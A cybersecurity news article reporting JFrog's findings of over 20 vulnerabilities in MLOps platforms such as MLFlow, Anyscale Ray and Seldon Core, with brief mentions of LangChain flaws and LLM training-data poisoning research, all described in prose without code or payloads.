Cyber security news for all

More

    Researchers Uncover Over 20 Supply Chain Vulnerabilities in MLOps Platforms

    Cybersecurity researchers have raised alarms about significant security risks in the machine learning (ML) software supply chain, following the discovery of over 20 vulnerabilities that could be exploited to compromise MLOps platforms.

    These vulnerabilities, categorized as inherent and implementation-based flaws, pose severe risks, including the potential for arbitrary code execution and the loading of malicious datasets.

    MLOps platforms are designed to enable the creation and execution of ML model pipelines, with a model registry serving as a repository for storing and versioning trained ML models. These models can be embedded within applications or made accessible to clients via an API, also known as model-as-a-service.

    “Inherent vulnerabilities are caused by the underlying formats and processes used in the target technology,” JFrog researchers explained in a detailed report. For instance, some ML models can be manipulated to run attacker-controlled code due to the automatic code execution features in formats like Pickle model files. This vulnerability extends to certain dataset formats and libraries, which could trigger malware attacks simply by loading a publicly available dataset.

    One notable example of inherent vulnerability involves JupyterLab, a web-based interactive computational environment that allows users to execute code blocks and view results. “An inherent issue is the handling of HTML output when running code blocks in Jupyter,” researchers pointed out. The problem is that JavaScript, when executed, is not sandboxed from the parent web application, allowing arbitrary Python code to run.

    In fact, JFrog identified an XSS vulnerability in MLFlow (CVE-2024-27132, CVSS score: 7.5), which could result in client-side code execution within JupyterLab due to insufficient sanitization of untrusted recipes.

    The second category of vulnerabilities relates to implementation weaknesses, such as a lack of authentication in MLOps platforms. This flaw could allow a threat actor with network access to gain code execution capabilities by exploiting the ML Pipeline feature. An example of this was seen in the case of unpatched Anyscale Ray (CVE-2023-48022, CVSS score: 9.8), where adversaries deployed cryptocurrency miners.

    Another critical implementation vulnerability involves a container escape in Seldon Core, enabling attackers to move laterally across cloud environments by uploading a malicious model to the inference server.

    These vulnerabilities could be weaponized not only to infiltrate and spread within an organization but also to compromise servers. “If you’re deploying a platform that allows for model serving, be aware that anyone who can serve a new model could also run arbitrary code on that server,” researchers warned. They emphasized the need for isolating and hardening the environment that runs these models against container escapes.

    This disclosure follows recent findings by Palo Alto Networks Unit 42 of two now-patched vulnerabilities in the open-source LangChain generative AI framework, which could have allowed arbitrary code execution and access to sensitive data. Similarly, Trail of Bits recently identified four issues in the Ask Astro chatbot application, which could lead to chatbot output poisoning, inaccurate document ingestion, and potential denial-of-service (DoS) attacks.

    As security vulnerabilities continue to be exposed in AI-powered applications, new techniques are also being developed to poison training datasets, ultimately aiming to trick large language models (LLMs) into generating vulnerable code. A group of academics from the University of Connecticut highlighted the sophisticated payload transformation methods used in such attacks, ensuring that both poisoned data and generated code evade vulnerability detection.

    Recent Articles

    Related Stories